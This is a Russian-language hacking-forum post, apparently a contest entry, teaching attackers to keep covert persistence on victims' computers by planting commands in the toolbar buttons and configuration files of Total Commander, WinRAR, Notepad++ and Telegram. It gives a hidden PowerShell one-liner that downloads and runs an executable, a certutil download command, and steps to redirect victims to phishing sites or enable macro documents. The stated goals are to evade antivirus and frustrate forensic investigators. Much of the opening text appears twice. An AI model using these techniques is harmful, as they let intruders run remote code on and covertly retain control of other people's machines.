Подмена файлов конфигурации

  • Автор темы Admin

Admin

#1
Администратор
Регистрация
31.12.2019
Сообщения
6,977
Реакции
34
Всем привет. Сегодня пойдет речь о троянских закладках в установленных программах, они же помогут нам оставаться во вражеских системах на долгое время, функционал которых будет ждать терпеливо своего часа, пока его не активирует сам USER при использовании популярных программ на которых приведу примеры, чтобы не лить воду пару примеров из последних видео chm - hijack тыц и тыц такой способ доставки груза подойдет как для закрепления в системе, так и для массовых загрузок, можно перепаковать софт и вставить нашу нагрузку, но тут есть не большой минус, неизвестно когда жертва зайдет в справку и.т.д, но сегодня у нас другой вариант и ждать долго не придется

Все мы знаем такой замечательный инструмент как Total Commander, который на многих сайтах входит в ТОП 100 программ тесты были на Total Commander 10.00 RC3. Данный софт реально ходячий #Lolbin, сегодня оставим пару закладок владельцу данного софта, можно и больше, но об этом чуть позже. Данный способ в принципе не плохо поможет закрепиться на тачке жертвы. И так, представляю вам, наглядные примеры дающие возможность оставить пару закладок владельцу данного софта, но укажу лишь основные для Вашего понимания всего метода.

Примечание — не когда не занимался сетками, по этому мне не известен софт который обычно установленный на машинах, по этому взял более или менее распространенный у простого юзер-зверька.




Установили, главное окно программы.

5c51a6371137c5f5c6f1c.jpg


Видим три вектора атаки, последний не мой, но принцип тут один, так что не будем на этом особо останавливаться, чтобы быстрей дождаться от стука Вашего зверька, стоит выбрать блокнот или кнопку обновить, так как это самое вероятное и быстрое взаимодействие жертвы с данными функциями.

Первая наша закладка (кнопка запуск)


d60ebb9d6f068cf253d91.jpg


Дальше в открывшемся окне, жмём добавить и название.

87a312807005fe16081d0.jpg


Вставляем команду, жмем ок

4d0b40e34ec8e981734ac.jpg


Чтоб не спалиться, название выбирайте соответственно, что будите подтягивать в своем примере выбрал .chm так как в меню будет справка, что впринципе логично. Для команды любые почти подойдут, не стал заморачиваться так как это только демонстрация, по этому использовал в тестах (cmd /c certutil -VerifyCTL -f -split https://the.earth.li/w32/putty.exe) а, если знаем что у "клиента" ОС Windows 10, то можно через wget или curl которые с недавнего времени стоят в ОС Windows 10 по умолчанию и во всех обновленных 8-ках и 7-ках. То можем использовать команду для загрузки и старта "putty))" Боевая версия команды, которая не должна палится:

Код:
[/B][/B][/B][/B][B][B][B][B][B][B] 		powershell -exec bypass -w hidden wget https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe -outfile C:/Users/Public/putty.exe ; Start-sleep -S 10 ; start-process C:/Users/Public/putty.exe 	
[/B][/B]



Всем привет. Сегодня пойдет речь о троянских закладках в установленных программах, они же помогут нам оставаться во вражеских системах на долгое время, функционал которых будет ждать терпеливо своего часа, пока его не активирует сам USER при использовании популярных программ на которых приведу примеры, чтобы не лить воду пару примеров из последних видео chm - hijack тыц и тыц такой способ доставки груза подойдет как для закрепления в системе, так и для массовых загрузок, можно перепаковать софт и вставить нашу нагрузку, но тут есть не большой минус, неизвестно когда жертва зайдет в справку и.т.д, но сегодня у нас другой вариант и ждать долго не придется
biggrin.png





Все мы знаем такой замечательный инструмент как Total Commander, который на многих сайтах входит в ТОП 100 программ тесты были на Total Commander 10.00 RC3. Данный софт реально ходячий #Lolbin, сегодня оставим пару закладок владельцу данного софта, можно и больше, но об этом чуть позже. Данный способ в принципе не плохо поможет закрепиться на тачке жертвы. И так, представляю вам, наглядные примеры дающие возможность оставить пару закладок владельцу данного софта, но укажу лишь основные для Вашего понимания всего метода.

Примечание — не когда не занимался сетками, по этому мне не известен софт который обычно установленный на машинах, по этому взял более или менее распространенный у простого юзер-зверька.



Установили, главное окно программы.

24054



Видим три вектора атаки, последний не мой, но принцип тут один, так что не будем на этом особо останавливаться, чтобы быстрей дождаться от стука Вашего зверька, стоит выбрать блокнот или кнопку обновить, так как это самое вероятное и быстрое взаимодействие жертвы с данными функциями.

Первая наша закладка (кнопка запуск)

24055



Дальше в открывшемся окне, жмём добавить и название.

24056



Вставляем команду, жмем ок

24057



Чтоб не спалиться, название выбирайте соответственно, что будите подтягивать в своем примере выбрал .chm так как в меню будет справка, что впринципе логично. Для команды любые почти подойдут, не стал заморачиваться так как это только демонстрация, по этому использовал в тестах (cmd /c certutil -VerifyCTL -f -split https://the.earth.li/w32/putty.exe) а, если знаем что у "клиента" ОС Windows 10, то можно через wget или curl которые с недавнего времени стоят в ОС Windows 10 по умолчанию и во всех обновленных 8-ках и 7-ках. То можем использовать команду для загрузки и старта "putty))" Боевая версия команды, которая не должна палится:


Код:







powershell -exec bypass -w hidden wget https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe -outfile C:/Users/Public/putty.exe ; Start-sleep -S 10 ; start-process C:/Users/Public/putty.exe


с ран-таймом в 10 секунд и читаем далее, так как эта команда вам может пригодится в тандеме с другим методом описанным ниже.
Продолжаем, закладка номер два (блокнот)


d826e147723358d0c92f9.jpg


Данные кнопки стоят по умолчанию, можно добавить свои, но это думаю будет заметно для жертвы, наводим на кнопку, клик правой кнопки мыши, вызываем контекстное меню и раздел (изменить) далее также ставим команды.

810633ef43bec8cb45491.jpg


Да приятный бонус тут в том, что все эти кнопки вы можите редачить и вставить свои нагрузки и.т.д

c6c25549ace5b31092f0f.jpg


Ну вот и все, думаю будем заканчивать на этом,
149706209.gif

кому надоело читать и смотреть скриншоты, можете сразу посмотреть видео демонстрацию в конце статьи, но это условие конкурса, чтоб было 7к бУкв. И так, третью закладку не буду описывать, так как не мной найдена, да и принцип там такой же, ниже приложу ссылку на Автора той статьи в которой есть ещё интересные плюшки (UAC) и.т.д.


Будем продолжать, когда Вы все выставите, нам нужно сохранить наши настройки.


77d57411097f933bfcc18.jpg


Теперь надо найти у себя два файла в которых есть данные конфигурации Тотал Коммандера, в которых собственно и хранятся его отдельные параметры.

Файл «Wincmd.ini» – самый главный. Он хранит основные настройки Total Commander:


• внешний вид программы (масштаб, шрифты, цвета, табуляторы, вид панелей инструментов);
• функциональные (ассоциации, основные операции и пр.);
• открытые вкладки;
• избранные каталоги;
• и т.п.


Ещё один тип конфигурационных данных, файл «Default.bar» – это параметры горизонтальной панели инструментов той, что вверху окна программы, которые можно перенести на другой компьютер – имеющие расширение «.bar».

Версии 9.51 и 10.00 RC3 данные файлы храниться по данному пути:

Код:
[/B]

 		C:\Users\Administrator\AppData\Roaming\GHISLER\wincmd.ini  C:\Program Files\totalcmd\DEFAULT.BAR 	

[B]

При условии, что у нас есть права и Shell доступ, телепортируем данные файлики на машину жертвы, для демонстрации воспользуемся софтом из паблика для лучшего понимания новичкам и школьникам, закатываем наши файлы с помощью Smart Install + ключ.

fe00c6924630481d9477f.jpg


Посыл: если у вас стоит задача закрепится в системе, рекомендую обратить свой взор на установленные программы с целью изучения их файлов конфигураций, которые надеюсь можно будет отредактировать.

Команда для просмотра установленных программ в системе:



Код:
reg query HKEY_LOCAL_MACHINE\SOFTWARE

Итог, почему все это затевалось:

1) Необычно и практически невозможно обнаружить закладку.
2) Усложнить жизнь ресерчерам и прочим деятелям по форензике.
3) На сегодняшний день уже становится не так просто закрепится в вражеском ПК, так как команды типо: "reg add", "scshtask" & "copy to startup folder" и им подобные палятся "any AV", по этому я вам представил вариант, возможную альтернативную методику закрепления.
4) Уверен и знаю, что имеются много программ с возможностью редактирования их функционала.
5) Возможность загружать с постоянной ссылки меняя файл и.т.д


https://youtu.be/oQEtQd68mgU

В принципе думал на этом закончить, но тут мне сказали, что ни разу не видели у жертв данный софт. Хорошо. Думаю проверю наш любимый WinRAR Архиватор и правда куда без него уже, но описывать тут впринципе нечего почти, принцип один и тот же как выше в Total Commander, даже проще так как WinRAR, не таскает собой файл конфигураций или не смог его найти, но смысл тут прост, тупо закидываем WinRAR.ini в папку и он его сам подтягивает.

Что можно и успел протестировать:

1.Поменять путь. (при открытии)
2.Назначить любую программу на открытие файлов.
3.Снять ограничение на запрещённые файлы.
4.Изменить клик по файлу. (один будет без подтверждения)
5.Больше не помню.............................


Но хотел ещё раз обратить внимание на данный способ, так как он не требует какой-то правки в реестре и т.д, что меньше палева со стороны всяких AV, такой файлик можно доставить с любым легитимным софтом без проблем. Да если жертва даже удалит WinRAR через Uninstall.exe, то Ваш файлик останется в тачке у него.


https://youtu.be/ogCs9OHMyxY

Так же по ходу решил за тестить всеми любимый Notepad++, как видим результат тот же и можно подставить свои настройки, можно изменить поисковую систему и отправить жертву на заранее подготовленный фиш сайт и т.д но самое забавное в Notepad++, что можно назначить клавиши для Ваших команд, но вы поняли думаю куда клоню, это только малая часть, что мне удалось найти за пару дней, если этому уделить должное внимание и обладать техническими знаниями, которыми меня жизнь к сожалению не наградила, то можно добиться устойчивости на любой тачке.

Окно cmd спецом оставил а то опять не поверят)



https://youtu.be/QWQXKu0-Eic

Возможно возникает логический вопрос, что не везде можно вставить команды, это справедливый вопрос, но и думать надо шире, возьмём тот же Telegram к примеру. Вспомним мою тему атака на WinRAR и 7-Zip, которая не вошла на конкурс по причине того, что не смог на кидать талмуд в 7к знаков
smile.png

(Админ я помню). Так вот, посмотрел настройки великого и могучего мессенджера пришел к выводу, что можно изменить тупо путь загрузки файла, а также можно снять ограничение на старт запрещенных (исполняемых) файлов и.т.д. Но вариант .exe не рассматриваю, мало сейчас дурачков кто откроет, а вот офисный документ думаю на раз, так как жертва уверена что все макросы у неё отключены. Видео демонстрации один и тот же файл с макросом, были только заменены два файла из настроек.


https://youtu.be/rnug1mI0biU


На этом ограничусь пожелав Всем крепкого Сибирского здоровья, также хочу по благодарить Администрацию борда и спонсора конкурса, пожелать Всем участникам фарту

Многие идеи и мысли были взяты отсюда тыц, если Вам интересны самые не обычные способы закрепа в тачке жертвы, просто листаем (← Предыдущие записи) там десятки, если не сотни способов, также Вам точно понадобятся самые свежие #Lolbin

p.s Видео демонстрации которые не вошли в данный топ,про Outlook и архиватор 7-Zip.


Автор: xrahitel
 

Members, viewing this thread

Сейчас на форуме нет ни одного пользователя.